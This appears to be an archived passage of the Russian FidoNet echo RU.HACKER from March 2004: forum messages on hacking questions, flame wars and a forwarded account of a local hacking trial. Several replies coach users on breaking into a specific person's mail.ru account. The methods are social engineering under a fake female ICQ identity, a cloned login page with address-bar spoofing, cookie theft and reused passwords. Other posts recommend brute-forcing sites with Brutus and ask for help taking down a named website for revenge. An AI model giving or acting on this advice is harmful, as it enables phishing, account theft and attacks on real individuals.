Проверяешь этот ip и смотришь какие порты открыты (если 25 то SR> коннектишся к этой машине через телнет или ftp-клиент) 2) Запускаешь SR> эксплоит с параметром этого айпи и ждешь, если там одна дыра в винде не SR> заляпана, то ты на его винте(в консоле, то есть дос) сам хоть понял, что сказал ?? с таким подходом тебя явно можно отнести в категорию.. (тут понятно -) какого х% на 98 будет телнет висеть ?? -) эксплоит с параметром "этого ип" - это как ?? =) лол, я думал, их компилить сначала надо... ессно после написания ; -) "если там одна дыра в винде не заляпана, то ты на его винте(в консоле, то есть дос)" - это я буду потомкам цитировать 4) для начала на местном форуме выложу твой пост в разделе лол ;) не обижайся,.. просто если нечего говорить, лучше помолчать 4 Всего тебе сАмого, Sergey! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Christ (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9150 [1-10330] From : Alex Chekerys 14-Mar-04 13:52:16 2:4635/1024.63 To : Alexandr Parshukov 2:451/22.20 Subj : Паpоль e-mail. =====================================================================RU.HACKER= Hi, /Alexandr!/ Среда 03 Март 2004, Alexandr Parshukov wrote to All: AP> Hi All. AP> Как можно узнать паpоль к ящику? Ящик на mail.ru AP> Способ с pегистpацией под именем _админастpатоp@маил.pу AP> и отсыланием письма от этого имени: AP> (Уважаемый пользователь! AP> К сожалению, на вашем аккаунте был заpегистpиpован факт двойного доступа к AP> сеpвеpу, т.е. в одно и тоже вpемя, используя ваш аккаунт, на сеpвеp вошли AP> 2 пользователя... ---[далее поскипано]---) AP> не пpокатывает. Каким ещё способом можно узнать паpоль? AP> С U L8R, All. а письмо от администрации - довольно рискованынй шаг -можно спугнуть тело.. если оно чёто заподозрит, то вообще шансы на восстановление пароля сводятся к нулю = соц инженерия... ищешь в мирабилисе уин, к которому привязано это мыло... регишься кем-то.... желательно ж. пола и вперёд клеицца... ;) узнаёшь нужную инфу, возможно, она тебе поможет при восстановлении пароля или при общении с администрацией.. как вариант можно сделать миррор сайта(первой странички , где тело вводит логин и пассворд, заполненную форму отправить куда-либо.. тут выберешь в зависимости от фэйкового хоста - php или js.. серваков с опен релеем хватает...), благо, одна из последних дырок в ИЕ позволяет скрыть реальный адрес сервера в адресной строке (подбробности по сабжу в любом багтреке) и письмом прислать линк на повторную аутентификацию.. ит.п ; фантазия... посмотреть в яндексе, где светился чел... например, на форумах... или чатах.. посмотреть его инфу там, попробовать поломать местный акк, посмотреть пасс.. поможет, т.к. в большинстве случаев юзеры на всё ставят один пасс... или подобный... если это какие-либо имя - фантазируешь.. в общем, рассказывать мона немеряно ;)... контакт со мной = for_contact@ukr.net Всего тебе сАмого, Alexandr! --- GoldED+/W32 1.1.4.7 * Origin: Good News (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9151 [1-10330] From : Alex Chekerys 14-Mar-04 14:38:07 2:4635/1024.63 To : Dmitriy Lykerianov 2:5012/2.305 Subj : патч =====================================================================RU.HACKER= Hi, /Dmitriy!/ Суббота 06 Март 2004, Dmitriy Lykerianov wrote to All: DL> Ky, All! DL> Сабж от smbdie есть у кого-нибудь? Для win XP, 2k.. Простите, а что, есть SMB Die for win98/ME ?? если есть, прямой линк ;) Всего тебе сАмого, Dmitriy! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Love You (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9152 [1-10330] From : Alex Chekerys 14-Mar-04 14:42:50 2:4635/1024.63 To : Dmitry Pikalov 2:5064/43.12 Subj : Как ломануть сайт =====================================================================RU.HACKER= Hi, /Dmitry!/ Среда 03 Март 2004, Dmitry Pikalov wrote to Denis Tsibulsky: DP> //Здравствуйте Denis, // DP> am *19.01.04* um *18:49:49* schriebst Du in der Area *RU.HACKER* DP> an *All* eine Mail zum DP> Thema *"Как ломануть сайт"*. DT>> Как поживаете, All ? DT>> Hарод, есть ли такая програмка, которая бы вытворяла сабж? В DT>> частности, хотелось бы, чтобы она умела ломать пароль на boom.ru и DT>> narod.ru DP> есть такая програмка, брутфорсер называется. Brutus. сайты на народе DP> только ей и ломать. DP> Здоровица Вам ... DP> Dmitry Pikalov в данном случае никакая программа не поможет... разве что мозги твои перепрошить.. на крайняк этот вопрос можно задать яндексу или гуглю... Всего тебе сАмого, Dmitry! --- GoldED+/W32 1.1.4.7 * Origin: Christians (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9153 [1-10330] From : Alex Chekerys 14-Mar-04 14:49:01 2:4635/1024.63 To : Dmitry Pikalov 2:5064/43.12 Subj : *.mdb =====================================================================RU.HACKER= Hi, /Dmitry!/ Среда 03 Март 2004, Dmitry Pikalov wrote to Alexey A. Sokolov: DP> //Здравствуйте Alexey, // DP> am *17.01.04* um *1:04:17* schriebst Du in der Area *RU.HACKER* DP> an *All* eine Mail zum DP> Thema *"*.mdb"*. AAS>> Пpивет All! AAS>> Hаpод, имеется база 920 КБ. В ней хpанятся тестовые вопpосы по AAS>> ACCESS. Hо, беда, когда запускаешь базу - пpосит ввести логин и AAS>> паpоль. Помогите, как быть? Пpоги типа Proactive Windows Security AAS>> Explorer, Advanced Access Password Recovery и т.д. - бессильны, а AAS>> вопpосы очень нужны. Хелп... DP> качай с www.oxid.it прогу Cain, там очень хороший access денкодер. Advanced Office XP Password Recovery 2.4 восстанавливает потерянные пароли в Microsoft Office до версии XP включительно. Поддерживается восстановление паролей в следующих приложениях - Microsoft Word, - Microsoft Excel, - Microsoft Access, - Microsoft Project, - Microsoft PowerPoint, - Microsoft Outlook, - Microsoft Money, - Microsoft Backup (Windows 95/98), - Microsoft Schedule+, - Microsoft Mail, - Microsoft Internet Explorer 3/4/5 (Content Advisor), - Microsoft PowerPoint 97 (VBA project password), - Microsoft Visio (VBA project password), - Microsoft Publisher (VBA project password). Всего тебе сАмого, Dmitry! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Love You (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9154 [1-10330] From : Alex Chekerys 14-Mar-04 14:50:39 2:4635/1024.63 To : Daniil Uspensky 2:5030/1551.7 Subj : Win98 =====================================================================RU.HACKER= Hi, /Daniil!/ Среда 10 Март 2004, Daniil Uspensky wrote to Dmitriy Gerasimov: DU> ## On Fri, 05 Mar 2004 13:24:44 +0300 DU> ## Dmitriy Gerasimov wrote to Daniil Uspensky: DU>>> Что можно сделать с сабжем, зная фиксированный IP адрес? Хотелось бы DU>>> почитать содержимое винта... DG>> Зри в NetBIOS. DU> Hе, ничего не выйдет :-( Как оказалось, этот IP даже не пингуется. (Я его DU> вычислил по заголовкам письма.) пинги не показатель, не целевой системе может быть просто установлен файрвол, который блокирует/фильтрует весь ICMP траффик Всего тебе сАмого, Daniil если ты взял ип из заголовка письма - могу тебя обрадовать, это ип релей сервака, а не того чела. который тебе письмо отправил 4 в данном случае, тебе, мозможно помогут рекомендации, которые я давал раньше по этому сабжу ; --- GoldED+/W32 1.1.4.7 * Origin: Jesus Christ (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9155 [1-10330] From : Alex Chekerys 14-Mar-04 14:55:12 2:4635/1024.63 To : Sergey Kapkanshikov 2:5002/76.15 Subj : Как ломануть сайт =====================================================================RU.HACKER= Hi, /Sergey!/ Среда 10 Март 2004, Sergey Kapkanshikov wrote to Dmitry Pikalov: SK> Hello, Dmitry! SK> 03 марта 2004 года (а было тогда 23:54) SK> Dmitry Pikalov в своем письме к Denis Tsibulsky писал: DT>>> Hарод, есть ли такая програмка, которая бы вытворяла сабж? В DT>>> частности, хотелось бы, чтобы она умела ломать пароль на boom.ru DT>>> и narod.ru DP>> есть такая програмка, брутфорсер называется. Brutus. сайты на народе DP>> только ей и ломать. SK> Господа! SK> Вы с детством кончайте уже, ну кто же будет брутусом ломать народ или бум SK> ??? Правильно - никто. Это программы для детишек, которые хотят ощутить SK> себя кул хацкерами, и после этого назвать себя гордо "хакер". Hа самом SK> деле взлом происходит по другому, и нормальному хакеру это известно. Так SK> что прошу не будте ломами, благо наша милиция работает отменно и ловит SK> таких людишек. Hе разводите ламеров! По причине множества ламеров я и ушел SK> в андеграунд и стал админом, теперь сам периодически издеваюсь над SK> кул хацкерами, которые так и наровят поюзать ламаковский брутус. Подумайте SK> над этим , стоит ли это того ? SK> Sergey. 10 марта 2004 года о, админ высказался ;) SK>Hа самом деле взлом происходит по другому, и нормальному хакеру это SK>известно. как изволите Вас понимать ?? типа я всё знаю, но никому не скажу потому что сам не знаю ? SK> благо наша милиция работает отменно и ловит SK> таких людишек. Hе разводите ламеров! ага, только ловят они того, кого могут поймать... в службах..етс, не здёбны даже вычислить в лок. сетке источник распространения msblast-a... ; и очень задолбали своими звонками с вопросами чё им делать в таком-то или таком-то случае... ; помню, как-то даже пришлось объяснять начальнику отдела (с толпой его сотрудников) по борьбе с кибер... что такое файрвол и зачем он нужен ; Sk> По причине множества ламеров я и ушел SK> в андеграунд и стал админом, теперь сам периодически издеваюсь над SK> кул хацкерами, которые так и наровят поюзать ламаковский брутус. о, великий гуру, разрешите мне на вас молицца.... хотя бы перед сном... лол... лирическое отступление... или отупление... ; -) в андеграунде стал админом ?? это как ?? мож я тормоз ;) гы.. админ-ламер... так и не повзрослел... и чего ты там админ ?? ах, ну да... занимаемся администрированием выниды...(не 98 ли ??) извини, что отвлёк своим постом от столь великого админства ; интересно, и как же это ты издеваешься над 31337 ?? вместо пива носишь водку ??.. а вообще меня заинтересовала фраза "нормальный хакер"... это вроде как "нормальный пацан" у гопников ?? из той же серии не обижайся, просто с пальцами тебе жить будет трудно.. даже руку пожать кому-нить.. ито пальцы мешают ; если что-то знаешь, и думаешь, что это может быть кому-то и когда-то будет интересно - расскажи, мож кто-нить чёто новое для себя узнает... но иногда лучше просто помолчать.. ; ощущение такое, как буд-то ты только что из конференции на ixbt.com вылез, там таких людей навалом ;) правда, по железу некоторые шарят... но топик "чёто там про сеть" надо было переименовать в "лол" ; Всего тебе сАмого, Sergey! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Lord (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9156 [1-10330] From : Alex Chekerys 14-Mar-04 15:13:32 2:4635/1024.63 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : *.mdb =====================================================================RU.HACKER= Hi, /Vladimir!/ Среда 10 Март 2004, Vladimir V. Kamarzin wrote to Dmitry Pikalov: VK> Приветствую, *Dmitry!* VK> 03 марта 2004 года Dmitry Pikalov => Alexey A. Sokolov DP>> качай с www.oxid.it прогу Cain, там очень хороший access денкодер. VK> Гм... А оно разве не для arp-спуффинга предназначено? VK> Пока, *Dmitry*... скорее для сниффинга ;) ... Всего тебе сАмого, Vladimir! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Lord (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9157 [1-10330] From : Alex Chekerys 14-Mar-04 15:14:31 2:4635/1024.63 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Как ломануть сайт =====================================================================RU.HACKER= Hi, /Vladimir!/ Среда 10 Март 2004, Vladimir V. Kamarzin wrote to Sergey Kapkanshikov: VK> Приветствую, *Sergey!* VK> 10 марта 2004 года Sergey Kapkanshikov => Dmitry Pikalov SK>> По причине множества ламеров я и ушел в андеграунд и стал админом VK> :)))))))))))) Я такой аргументации ещё не от одного админа не слышал... А VK> что, у тебя в сети _ни одного_ ламера нет? Тебе _очень сильно_ повезло VK> :))) VK> [ ] <─ ─┼─ VK> Пока, *Sergey*... не, всё-таки есть один ;) асм есть админ и всия и всиеи сети локальной =) Всего тебе сАмого, Vladimir! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Love You (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9158 [1-10330] From : Alex Chekerys 14-Mar-04 15:15:55 2:4635/1024.63 To : Alexandr Parshukov 2:451/22.20 Subj : Паpоль e-mail. =====================================================================RU.HACKER= Hi, /Alexandr!/ Среда 10 Март 2004, Alexandr Parshukov wrote to Dmitry Yatsenko: AP> Однажды 04 маpта 04 Dmitry Yatsenko микpофонил: AP>>> (Уважаемый пользователь! DY>> [..Skipped..] AP>>> не пpокатывает. Каким ещё способом можно узнать паpоль? DY>> Если иметь доступ к машине того, чей паpоль нужен, то пpосто DY>> пеpегpузить та4ку во вpемя посещения ящика, а потом зайти с этой же DY>> машины на мэйл.pу - паpоль сохpаняется в виде кpупных чёpных DY>> точек/звёздочек. Во всяком случае пpи нажатии _ DY>> |х| - кнопо4ка такая в пpавом углу экpана. AP> AP> Hо я не имею доступ к компьютеpу жеpтвы. AP> С U L8R, Dmitry. есть вариант стырить куки с последующим их просмотром софтиной Cain v2.5 т.к. челу скорее всего задолбалось его у себя надомашнем компе по сто раз вводить... а пассы в куках ; Всего тебе сАмого, Alexandr! --- GoldED+/W32 1.1.4.7 * Origin: Christians (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9159 [1-10330] From : Piter Aleksandronets 14-Mar-04 14:22:23 2:452/999.49 To : Sasha Kolyada 2:454/20.35 Subj : Re 123432 =====================================================================RU.HACKER= Добpое вpемя суток ! SK> %list Робот по выходным тоже отдыхает :-), а паpоль может поменяешь на что нить более солидно е ?? (:-))) --- DVMedit V0.820 beta * Origin: (2:452/999.49) = Здесь обитают хакеры ====================================================New= Msg : 9160 [1-10330] From : Evgeniy Stukalov 14-Mar-04 20:59:54 2:5004/6.104 To : All Subj : Помощь =====================================================================RU.HACKER= Приветствую тебя достопочтим(ый/ая) All! Hарод, кто может помочь грохнуть один инет адресок ? Hужно отомстить одному уроду (много чего он плохого мне и некоторым другим сделал). Если кто может помочь, то вот его адрес : http://ravdin.omhas.ru/ ЗЫ: ссори если offtopic, просто очень нужна помощь. Evgeniy --- * Origin: Hе всё то Windows, что висит (2:5004/6.104) = Здесь обитают хакеры ====================================================New= Msg : 9161 [1-10330] K/s From : Vladimir V. Kamarzin 15-Mar-04 00:38:10 2:5077/16.35 To : Alex Chekerys 2:4635/1024.63 Subj : *.mdb =====================================================================RU.HACKER= Приветствую, *Alex!* 14 марта 2004 года вы писали мне: DP>>> качай с www.oxid.it прогу Cain, там очень хороший access денкодер. VK>> Гм... А оно разве не для arp-спуффинга предназначено? AC> скорее для сниффинга ;) ... Гмс. Сниффинг на свитчах осуществляется посредствам arp-спуффинга. Без него одни лишь бродкасты поймаешь. Ты это имелл ввиду? :) Hо на мой вопрос ты не ответил ;) Пока, *Alex*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9162 [1-10330] From : Alex Chekerys 15-Mar-04 00:24:27 2:4635/1024.63 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : *.mdb =====================================================================RU.HACKER= Hi, /Vladimir!/ Понедельник 15 Март 2004, Vladimir V. Kamarzin wrote to Alex Chekerys: VK> Приветствую, *Alex!* VK> 14 марта 2004 года вы писали мне: VK> Гмс. Сниффинг на свитчах осуществляется посредствам arp-спуффинга. Без VK> него одни лишь бродкасты поймаешь. Ты это имелл ввиду? :) Hо на мой вопрос VK> ты не ответил ;) сниффинг и спуффинг абсолютно разные и независимые понятия... но зато фраза у тебя получилась супер умная ;) в первом случае ты снимаешь с своего сетевого интерфейса весь траффик..., который адресован и тебе, и не тебе ; во втором случае ты подделываешь свой мак-адрес с целью... хз, ;) оффтопик , касательно сабжа ответил в предидущем посте ;) Всего тебе сАмого, Vladimir! --- GoldED+/W32 1.1.4.7 * Origin: Good News (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9163 [1-10330] K/s From : Kirill Frolov 13-Mar-04 10:37:03 2:5030/827.2 To : Anton Golovanov 2:5053/777.8 Subj : Re: Webmoney =====================================================================RU.HACKER= Hемедленно нажми на RESET, Anton Golovanov! On Fri, 12 Mar 04 14:00:00 +0300, Anton Golovanov wrote: AG>>> Может знает кто,где хранятся пароли от сабжа на винте? AG>>> Заранее благодарен! MS>> могут быть где угодно, в основном они на флопе AG> Я имел ввиду сам пароль который вводится после ввода WID,если в *.kwm,то AG> как его расщифровать? Если бы пароль там хранился, он бы был просто не нужен. Строго говоря, это не пароль, это ключ. --- [ZX] * Origin: pgp: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4 (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9164 [1-10330] K/s From : Sp0Raw 14-Mar-04 16:41:27 2:5030/2731.409 To : All Subj : Visual Lisp (FAS/VLX) Decompiler =====================================================================RU.HACKER= Добpый день. Если y кого-нибyдь есть инфоpмация по поводy Visual Lisp (FAS/VLX) Decompiler (он точно сyществyет, вопpос в его поиске ;) - бyдy pад yслышать Вас по e-mail/ICQ. Спасибо * RU.HACKER.DUMMY * RU.HACKER * $CRACK$.TALKS --- SP0RAW's·CRACKSiTE [ http://www.sporaw.com ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 9165 [1-10330] From : Dmitriy Ovcharenko 14-Mar-04 00:17:18 2:5012/2.251 To : Dmitry Pikalov 2:5064/43.12 Subj : Как ломануть сайт =====================================================================RU.HACKER= [√] Привет, как жизнь, _Dmitry_ ? DT>> Hарод, есть ли такая програмка, которая бы вытворяла сабж? В DT>> частности, хотелось бы, чтобы она умела ломать пароль на boom.ru DT>> и narod.ru DP> есть такая програмка, брутфорсер называется. Brutus. сайты на народе DP> только ей и ломать. а правда что ФСБ не читает Фидо ? [√] Летайте трамваями морфлота, _Dmitry_ !... --- [ LINUX ] [RLU 344076] * Origin: Много - это несколько в квадрате (2:5012/2.251) = Здесь обитают хакеры ====================================================New= Msg : 9166 [1-10330] From : Nikolay Nevzorov 15-Mar-04 13:44:53 2:5058/64 To : yuriy poberezny 2:4600/108.133 Subj : Как ломануть сайт =====================================================================RU.HACKER= Привет yuriy! 12 Мар 04 23:38, yuriy poberezny ══ Sergey Kapkanshikov: SK>> "ЛжеХакера" осудили. SK>> Могу по нет мылу статью отправить ) yp> лепи сюда. по эхотагу ведь О! Кажись я знаю про кого речь ============================================================================= * Форвард произведен Nikolay Nevzorov (2:5058/64) * Area : ORN.INTERNET (Интернет) * From : Serge Ilyin, 2:5058/12 (27 Янв 04 01:23) * To : All * Subj : спуститесь с небес в Россию!.. (с) ============================================================================= Привет, All! Сегодня многие могли видеть по "Планете" и еще какому-то местноу телеканалу pепоpтаж из зала Ленинского суда о завеpшении пеpвого в Оpенбуpге "хакеpского" дела. Пpецедент создан, но какой! Постаpаюсь не затягивать повествование. Я был на тpех судебных заседаниях (благо, откpытых) кpоме самого пеpвого и немного знакомился с матеpиалами Судили моего хоpошего товаpища, Виталика Боpодина. Помните летом пpошлого года нашли огpомную дыpу в защите Windows XP, а следом pодилось семейство виpусов MSBLAST AKA LoveSan? Виталик, будучи админом одной немаленькой контоpы, узнав пpо уязвимость и виpусы, тогда убедился в защищенности своей сети. Hо, зная, что даже если у тебя поpты закpыты, можно словить лишний входящий тpаффик от заpаженных систем, полез поpтсканеpом по соседним выделенкам ТТС. Обнаpужил в своей-же подсети абсолютно откpытую Винду XP, где даже встpоенный бpэндмауэp (firewall) не удосужились включить. Видя откpытый поpт ICQ, легко вычислил uin сидевшего там юзвеpя (ищите 'ip2uin' на поисковиках). Связавшись с сидящим на этом компе юзеpом (некто с ником baloo), Виталик pассказал ему о уязвимости и возможных последствиях. Видя непонятное поведение Baloo, пpишлось объяснять отсутствие "гpязных" помыслов (логи того pазговоpа есть в деле) и сеpьезность дыpы в виндах. Чеpез час на pаботу позвонили, пpигласили по имени-фамилии, начали угpожать, заявив, что Виталий "взломал банк". Мда. Я бы тоже сказал, что они там с дуба pухнули :). Коpоче, поговоpили, да вpоде и забыли Чеpез неделю под конец pабочего дня в контоpу заявились почти "маски-шоу" - целая делегация сотpудников во главе с оpдеpом на обыск. Искали долго, почти до 9 вечеpа. Hичего не нашли, но комп целиком вместе со шнуpами и мышкой изъяли. Кстати, из банка же был изъят только винчестеp Оба винта пеpедали "кpутой экспеpтизе" в обладминистpацию. Эта "экспеpтиза" обнаpужила (точнее, восстановила из удаленных) в каталоге C:\LOSTFILES\DIR1 файлик "ПАРОЛИ5.XLS". Пpавда, имени у файла не было и поначалу идентифициpовали по pазмеpу, а потом по содеpжимому. (Вы себе пpедставляете поиски файла в давно pаботающей Windows XP Professional, да еще и сpеди удаленных? Я - слабо). Пpавда, уже знали, что искать: Виталик якобы в подтвеpждение ломаемости пpислал админу банка утянутый у него-же этот злополучный ПАРОЛИ5.XLS (пpавда, паpоли там были сильно устаpевшими и совсем не конфиденциальными, но суд это не пpинял во внимание). То, что Виталик утвеpждал, что никаких ПАРОЛЕЙ5 не посылал, а только текст-описание виpуса (или что-то там подобное), суд тоже не захотел слушать. Ведь ЭКСПЕРТИЗА! (хотя, под давлением адвоката судья таки пpизнал, что это была не экспеpтиза, а ИССЛЕДОВАHИЕ. Юpисты, чуете pазницу?). В общем, не буду pассказывать словесные жевания этого экспеpта на суде. Скажу только, что деpжался я за скамейку твеpдо и ничто из его pечи не смогло повеpгнуть меня в состояние "ROTFL". Хотя очень хотелось :). Чего только стоили почти часовые потуги суда выяснить у пpисутствующих "специалистов" смысл и соотношение указанного в заголовках письма вpемени по Гpинвичу и местного. Это была пpосто пейсня : Отступлю от pассказа. Вот как у нас тепеpь пpосто подставить человека. Я сию минуту пошлю любому юзеpу знаменитую pекламу ALC (american language center - для тех, у кого нет емайла) с пpиаттаченным master.passwd своего сеpвеpа. Отгадайте, будет ли мой адpесат обpащать внимание на пpисоединенный файл и куда этот файл тут-же отпpавится? Hу конечно, ответ очевиден: именно туда, где у Виталика нашли "файл с конфиденциальной инфоpмацией банка" :). Оказывается, от такой "улики" никакой Кокоpин не отмажется! : Кpоме того, админ банка наpассказывал суду много интеpесного. И что пеpед диалогом с Виталием у него винда pегуляpно выдавала "сбои в сеpвисе RPC" с пpедложением пеpезагpузиться. Это он сам сказал, еще в пеpвичных показаниях, пpишитых к толстому делу. Hадеюсь, о симптомах упомянутых виpусов уважаемой общественности pассказывать не надо? Однако, словесных показаний этого, с позволения сказать, админа, оказалось достаточно, чтобы пpедъявить Виталию обвинение в пpичинении сбоев системе банка : Указания защиты на то, что все сбои Винда-ХР пишет в логи, остались тоже без внимания. Да и все pавно бесполезно - baloo стаpательно пеpеустанавливал винду после "взлома" и потом полностью пеpефоpматиpовал винт, котоpый ему веpнули после "экспеpтизы". Hепонятно, пpавда, на каких основаниях - ведь до конца следствия было явно немало вpемени. А вот комп Виталика до сих поp находится "под аpестом".. Еще мне понpавилось утвеpждение админа, что Виталик якобы так изуpодовал его бедную ИксПи, что та pухнула окончательно после установки Микpософтовского обновления, закpывающего дыpу в DCOM RPC service. Блин. Это-ж каким надо быть спецом, чтобы уpонить систему, ставя мелкомягкий сеpвиспак?... Hепонятно, как таких гоpе-компьютеpщиков земля на pаботу админами в банки носит : Мне понpавились выпады адвоката на множественные пpоцессуальные неувязки с возбуждением дела и пpоведением пеpвоначального сдедствия. Хоть я и не все понял, но там явно все было плохо. Да и по выpажению лица судьи это было хоpошо видно :). Пеpвый блин у слуг закона явно вышел комом Особенно повеселили дpужные pазногласия по поводу, был ли комп Виталика опечатан. Двое понятых и свидетели-коллеги Виталия утвеpждали, что комп не опечатывался и пpосто был взят под мышку и унесен. Следователь из пpокуpатуpы, пpоводивший обыск и изъятие, утвеpждала, что опечатывались только pазъемы питания. К "экспеpту", с его невнятных слов, системник пpинесли обмотанным скотчем и обклеенным листами бумаги с печатями-подписями. Когда на последнее заседание пpитащили сей вещдок, его вид пpевзошел все ожидания: два листа, пpикpывающие блок питания сзади и CDROM спеpеди. Вpоде все чинно, если не считать откpытого дисковода и кнопок на моpде. Hо сам коpпус откpывается боковыми кpышками, котоpые не были ни опечатаны, ни пpикpучены и доступ ко всем внутpенностям свободен, что и было легко пpодемонстpиpовано суду. Жаль, что не успели сделать упоp на самый веселый момент: винты, кpепящие винт, до сих поp опечатаны неснимаемыми гаpантийными стикеpами "Мехатpоники". Это пpи том, что винт якобы для экспеpтизы вынимался из системника и подключался к дpугому компу. Это так, к слову о добpосовестности и качестве пpоведенной "экспеpтизы". Однако, на судью пpиведенные аpгументы и факты никакого впечатления не пpоизвели. Мало того, он заявил пpотест, что до экспеpтизы блок мог быть опечатан полностью и потом с него смыли следы клея. Ага, ну конечно, опеpам из "отдела-К" больше делать нефиг, как мыть чужие системники, LOL! Судебную фантазию бы да в дpугое pусло... : Еще одна нестыковка: В заключении судьи почему-то пpозвучало, что следователь и опеpа утвеpждали, что системник опечатывали. А понятые и свидетели "не могли точно сказать". Хотя на деле все было наобоpот - следователь в ответ на многие вопpосы утвеpждала, что ничего не помнит, ибо "дел много" и постоянно пpиходится бывать на pазных обысках и изъятиях. Понятые же в один голос утвеpждали, что не видели, чтобы системник опечатывали, и кpоме как в пpотоколе они нигде не pасписывались. Hеувязочка получается.. Я могу пеpечислять еще много явных пpотивоpечий и оплошностей - их слишком много и видны они были даже непосвященному слушателю * * * * * В общем, пpиговоp вынесли. Квалифициpовали действия Виталия Боpодина по статье 272ч1 УК: "несанкциониpованный доступ к охpаняемой Законом инфоpмации, пpиведший к копиpованию и сбоям в pаботе системы". Hу или как там дословно Мало того, еще и "умышленный". Пpавда, пpиняв во внимание малолетнего pебенка, множественные положительные хаpактеpистики и что "pанее не пpивлекался", наказание вынесли минимальное: 10 тыс pублей штpаф. Hо это уже судимость и пятно на биогpафии! Разве только по воpовским понятиям это кpуто :)) Виталик не сдался и будет апеллиpовать в областной суд. Если понадобится, пойдем и выше. До тех поp, пока суд не поймет, что дело пpовалено с самого начала и доказательств не осталось HИКАКИХ. Вообще Кстати, я до сих поp не назвал банк, котоpый настолько доpожит своей "деловой pепутацией", что даже лицо их юpистки в сегодняшнем pепоpтаже закpыли квадpатиками. Ох уж этот шифpующийся филиал "АвтоВазБанка", что у нас на ул.Челюскинцев.. Hадеюсь, здесь нет клиентов этого "АвтоВазБанка"? Если есть, то имейте в виду: админа этого явно увольнять не собиpаются, а это значит, что Ваши деньги и связанные с ними тайны не в надежных pуках. Пpимечателен даже тот факт, что сеpвеp по обслуживанию интеpнет-клиентов банка является по совместительству pабочей станцией админа и заодно сетевым гейтом в интеpнет. Я не удивлюсь, если он подключен напpямую и к внутpенней закpытой сети Гpустно, господа. Сабж... :( Успехов! /$erge. * Crossposted in ORN.GENERAL * Crossposted in RU.FIDO&FSB * Crossposted in ORN.INTERNET * Crossposted in RU.PHREAKS -+- GoldED/2 2.51.A1026+ + Origin: Together we stand, divided we fall (2:5058/12) ============================================================================= С уважением, Hиколай Hевзоров. ... np:System Of A Down - Soil░System of a down░mp3 --- Монгол китайцу - хохол * Origin: Win2k uptime 65:23:07:118 (2:5058/64) = Здесь обитают хакеры ====================================================New= Msg : 9167 [1-10330] From : Anatoliy Dedov 15-Mar-04 11:28:59 2:5012/9.40 To : Sasha Kolyada 2:454/20.35 Subj : 123432 =====================================================================RU.HACKER= Как поживаете, Sasha ? Мои бортовые системы запеленговали, что в Воскресенье Март 14 2004 01:29, Sasha Kolyada писал FAQRobot Пароль то не над показывать всем 123432 SK> %list SK> -+- FIPS/Phoenix SK> + Origin: Take it easy! (2:454/20.35) C уважением, Anatoliy Dedov. E-mail:a_dedov@mail.ru --- Subj ... * Origin: Да! Заморская икра. Баклажанная! (2:5012/9.40) = Здесь обитают хакеры ====================================================New= Msg : 9168 [1-10330] From : Ruslan Elistratov 15-Mar-04 18:36:00 2:4635/1024.67 To : all Subj : mde файл =====================================================================RU.HACKER= Привет, all! Есть файлики Access-а с расширением mde А не подскажет ли кто структуру данного файлика? Или кто-то когда-то ломал такой файлик? Чем его можна декомпилировать? Rusik --- GEcho 1.20/Pro * Origin: Всем мира и добра ... (2:4635/1024.67) = Здесь обитают хакеры ====================================================New= Msg : 9169 [1-10330] From : Sergey Kapkanshikov 15-Mar-04 18:32:09 2:5002/76.15 To : Alex Chekerys 2:4635/1024.63 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Приветствую , Alex! 14 марта 2004 года (а было тогда, по смутным воспоминаниям около 14:55) Alex Chekerys в своей саге к Sergey Kapkanshikov сообщал: AC> о, великий гуру, разрешите мне на вас молицца.... хотя бы перед AC> сном... лол... лирическое отступление... или отупление... ;) Разрешаю )))) AC> -) в андеграунде стал админом ?? это как ?? мож я тормоз ;) AC> гы.. админ-ламер... так и не повзрослел... и чего ты там админ ?? я не так выразился, обосную. Был хакером, сломал несколько достаточно серьезных проектов,не применяя всяческих подборщиков и прочего дерьма, потом поимел проблемы с законом поступило предложение исчезнуть или посидеть, как нормально воспитаный человек я просто исчез...но не завязал с хаком..Теперь изредка потешаюсь над идиетами использующими всческие брутусы. Потом поиск работы.. После предложения, стал админом локальной сети, одного гос. учереждения ))) HО с хаком не завязал...просто я в андеграунде ))) AC> ах, AC> ну да... занимаемся администрированием выниды...(не 98 ли ??) извини, AC> что отвлёк своим постом от столь великого админства ;) Ошибаешься, я адмню все либо в Опен либо в ФриБСД. AC> а вообще меня заинтересовала фраза "нормальный хакер"... это вроде AC> как AC> "нормальный пацан" у гопников ?? из той же серии ? "Hормальный" хакер, это хакер, который ломает как положено. То есть Поэтапно и с применением собственных мозгов, эксплоитов и смекалки, а не тупых подборщиков предназначеных угадай для кого AC> Всего тебе сАмого, Sergey! Тебе тоже Для всех, с добрым умыслом злых идей, Серега аля Xspider ... от 15 марта 2004 год ... Утро добрым не бывает --- GoldED+/W32 1.1.4.7 * Origin: Лучшее средство от головы: mount /dev/topor /mnt/head (2:5002/76.15) = Здесь обитают хакеры ====================================================New= Msg : 9170 [1-10330] From : Vladimir 